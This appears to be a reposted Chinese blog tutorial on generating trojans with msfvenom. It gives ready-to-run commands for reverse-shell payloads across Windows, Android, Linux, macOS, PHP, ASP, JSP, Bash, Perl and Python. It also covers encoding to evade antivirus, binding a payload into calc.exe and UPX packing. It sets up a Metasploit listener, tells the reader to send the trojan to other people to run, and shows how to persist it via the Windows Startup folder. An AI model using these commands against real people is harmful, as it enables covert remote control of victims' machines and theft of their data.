msfvenom生成muma
簡介
msfvenom是msfpayload,msfencode的結合體,可利用msfvenom生成木馬程序,并在目標機上執行,在本地監聽上線。
參數
–p (- -payload-options):添加載荷payload。載荷這個東西比較多,這個軟件就是根據對應的載荷payload生成對應平臺下的后門,所以只有選對payload,再填寫正確自己的IP,PORT,就可以生成對應語言,對應平臺的后門。
· –l:查看所有payload encoder nops。
· –f :輸出文件格式。
· –e:編碼免殺。
· –a:選擇架構平臺? x86 | x64 | x86_64
· –o:文件輸出
· –s:生成payload的最大長度,就是文件大小。
· –b:避免使用的字符 例如:不使用 ‘\0f’。
· –i:編碼次數。
· –c:添加自己的shellcode
· –x | -k:捆綁
生成exe木馬
#lhost是我們的主機ip,lport是我們主機的用于監聽的端口
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.31.129 lport=8888 -f exe -o test.exe?
#編碼3次
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.31.129 lport=8888 -i 3 -e x86/shikata_ga_nai? -f exe -o test.exe?
#編碼10次、捆綁正常的32位calc.exe,生成32位的test.exe文件
msfvenom -a x86 --platform windows -p windows/shell_reverse_tcp -e x86/shikata_ga_nai -i 10 lhost=192.168.31.129 lport=8888 -x calc.exe -f exe -o test.exe
?
利用 upx 加殼
upx的功能有兩種描述。一種叫做給程序加殼,另一種叫壓縮程序。其實這兩種表述都是正確的,只是從不同的角度對upx的描述。upx的工作原理其實是這樣的:首先將程序壓縮。所謂的壓縮包括兩方面,一方面在程序的開頭或者其他合適的地方插入一段代碼,另一方面是將程序的其他地方做壓縮。壓縮也可以叫做加密,因為壓縮后的程序比較難看懂,主要是和原來的代碼有很大的不同。最大的表現也就是他的主要作用就是程序本身變小了。變小之后的程序在傳輸方面有很大的優勢。其次就是在程序執行時,實時的對程序解壓縮。解壓縮功能是在第一步時插入的代碼完成的功能。聯起來 就是:upx可以完成代碼的壓縮和實時解壓執行。且不會影響程序的執行效率。upx和普通的壓縮,解壓不同點就算在于upx是實時解壓縮的。
upx -9 test.exe -k -o test1.exe
生成其他格式木馬:
安卓app:
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.31.129 LPORT=8888 -o ~/Desktop/test2.apk
Linux:
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.31.129 LPORT=8888 -f? elf > shell.elf
Mac:
msfvenom -p osx/x86/shell_reverse_tcp LHOST=192.168.31.129 LPORT=8888 -f macho >? shell.macho
PHP:
msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.20.27 LPORT=4444 -f raw -o test.php
ASP:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.31.129 LPORT=8888? -f asp > shell.asp
ASPX:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.31.129 LPORT=8888? -f? aspx > shell.aspx
JSP:
msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.31.129 LPORT=8888 -f? raw > shell.jsp
Bash:
msfvenom -p cmd/unix/reverse_bash LHOST=192.168.31.129 LPORT=8888 -f?? raw > shell.sh
Perl
msfvenom -p cmd/unix/reverse_perl LHOST=192.168.31.129 LPORT=8888 -f raw > shell.pl
Python
msfvenom -p python/meterpreter/reverser_tcp LHOST=192.168.31.129 LPORT=8888 -f?? raw > shell.py
#使用exploit/multi/handler監聽從肉雞發來的數據
msf > use exploit/multi/handler?
#設置payload,不同的木馬設置不同的payload
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp?
#主機ip
msf exploit(handler) > set lhost 192.168.31.129?
#主機端口
msf exploit(handler) > set lport 8888???????????
msf exploit(handler) > exploit
然后利用任何一種方式發送給其他人,讓其在其他主機上運行,這邊就會接收到反彈過來的session。
輸入:sessions? -l? 可以查看到得到的shell,使用 sessions -i? 1 可以進入指定的shell
對于這個木馬,如果在獲取到某主機的shell后,想要在目標主機建立持續性的后門,可以將該木馬放到目標主機的開機啟動項中,只要該主機啟動后,就可以連接到該主機了。
C:\Users\$username$\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
總結
以上是生活随笔為你收集整理的msfvenom生成muma的全部內容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: Fiddler手机APP抓包及无法连接网
- 下一篇: 文件包含漏洞和上传漏洞